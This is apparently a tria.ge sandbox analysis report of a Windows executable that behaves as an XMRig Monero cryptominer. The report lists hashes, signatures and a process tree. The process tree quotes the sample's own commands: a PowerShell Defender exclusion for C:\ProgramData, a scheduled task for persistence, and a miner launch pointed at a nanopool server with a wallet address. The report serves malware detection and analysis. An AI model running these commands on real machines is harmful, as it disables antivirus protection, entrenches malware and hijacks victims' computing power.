Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
06/03/2024, 22:46
240306-2pzx2abc39 723/12/2022, 20:25
221223-y7mhwahb34 1023/12/2022, 20:11
221223-yx8ncscc9x 1023/12/2022, 20:03
221223-ys7v9sha97 10Analysis
-
max time kernel
600s -
max time network
552s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23/12/2022, 20:25
Static task
static1
Behavioral task
behavioral1
Sample
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Resource
win7-20221111-en
General
-
Target
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
-
Size
2.1MB
-
MD5
55a350a007f6943a7e09f4abfdfa6979
-
SHA1
c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
-
SHA256
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
-
SHA512
707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
-
SSDEEP
49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/1092-103-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-105-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-107-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-108-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-110-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-112-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-118-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1092-117-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-120-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-122-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1092-126-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1356 HMHM.exe -
Loads dropped DLL 2 IoCs
pid Process 1884 taskeng.exe 1884 taskeng.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1284 set thread context of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1084 schtasks.exe 188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 656 powershell.exe 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 1356 HMHM.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeLockMemoryPrivilege 1092 vbc.exe Token: SeLockMemoryPrivilege 1092 vbc.exe Token: 33 1556 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1556 AUDIODG.EXE Token: 33 1556 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1556 AUDIODG.EXE Token: SeDebugPrivilege 1356 HMHM.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1092 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1284 wrote to memory of 656 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1284 wrote to memory of 656 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1284 wrote to memory of 656 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1284 wrote to memory of 1880 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 30 PID 1284 wrote to memory of 1880 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 30 PID 1284 wrote to memory of 1880 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 30 PID 1880 wrote to memory of 1084 1880 cmd.exe 32 PID 1880 wrote to memory of 1084 1880 cmd.exe 32 PID 1880 wrote to memory of 1084 1880 cmd.exe 32 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1284 wrote to memory of 1092 1284 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 34 PID 1884 wrote to memory of 1356 1884 taskeng.exe 39 PID 1884 wrote to memory of 1356 1884 taskeng.exe 39 PID 1884 wrote to memory of 1356 1884 taskeng.exe 39 PID 1356 wrote to memory of 1896 1356 HMHM.exe 40 PID 1356 wrote to memory of 1896 1356 HMHM.exe 40 PID 1356 wrote to memory of 1896 1356 HMHM.exe 40 PID 1356 wrote to memory of 680 1356 HMHM.exe 41 PID 1356 wrote to memory of 680 1356 HMHM.exe 41 PID 1356 wrote to memory of 680 1356 HMHM.exe 41 PID 680 wrote to memory of 188 680 cmd.exe 43 PID 680 wrote to memory of 188 680 cmd.exe 43 PID 680 wrote to memory of 188 680 cmd.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:1084
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1092
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1100
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5001⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
C:\Windows\system32\taskeng.exetaskeng.exe {F021B191-DF9B-4500-87DB-46E22AD0A10B} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\ProgramData\edge\HMHM.exeC:\ProgramData\edge\HMHM.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Drops file in System32 directory
PID:1896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"4⤵
- Creates scheduled task(s)
PID:188
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
607.0MB
MD5ec90b1372498a9657941009302dc4e0c
SHA195ecb791a0f9ba1d364a1cc5f2abd1a21baf9588
SHA256a7172b48ac13ed881788872d3ae4dd258edfc42dcdd26784ee84a8dac6b4e7c5
SHA512aa6e47e9c3f1cfa55a9142098d43cbc264d5307d5173cc5f0e457a347ec241225e63d29cbb37a3cda6cc967d0e42e6d3c61a55d8ef68c0522ad039a549f8964a
-
Filesize
607.0MB
MD5ec90b1372498a9657941009302dc4e0c
SHA195ecb791a0f9ba1d364a1cc5f2abd1a21baf9588
SHA256a7172b48ac13ed881788872d3ae4dd258edfc42dcdd26784ee84a8dac6b4e7c5
SHA512aa6e47e9c3f1cfa55a9142098d43cbc264d5307d5173cc5f0e457a347ec241225e63d29cbb37a3cda6cc967d0e42e6d3c61a55d8ef68c0522ad039a549f8964a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a17a5978fd1af54c961bf139e40ea25a
SHA113850ed83d39fa6f1c82044cf7329afa99af9d3f
SHA25646ef6ebb5de7fec7357f1a552418081da4e04881e5599b4da3991d53924e1498
SHA512b8dd4bb79e693d159c28ea3e25e3722827631dbd47fe1ca337470d1a716c748f051f86935dc9de04fe044f382365d5da57ebc558924570b2bd102dbef17cf3b5
-
Filesize
607.0MB
MD5ec90b1372498a9657941009302dc4e0c
SHA195ecb791a0f9ba1d364a1cc5f2abd1a21baf9588
SHA256a7172b48ac13ed881788872d3ae4dd258edfc42dcdd26784ee84a8dac6b4e7c5
SHA512aa6e47e9c3f1cfa55a9142098d43cbc264d5307d5173cc5f0e457a347ec241225e63d29cbb37a3cda6cc967d0e42e6d3c61a55d8ef68c0522ad039a549f8964a
-
Filesize
607.0MB
MD5ec90b1372498a9657941009302dc4e0c
SHA195ecb791a0f9ba1d364a1cc5f2abd1a21baf9588
SHA256a7172b48ac13ed881788872d3ae4dd258edfc42dcdd26784ee84a8dac6b4e7c5
SHA512aa6e47e9c3f1cfa55a9142098d43cbc264d5307d5173cc5f0e457a347ec241225e63d29cbb37a3cda6cc967d0e42e6d3c61a55d8ef68c0522ad039a549f8964a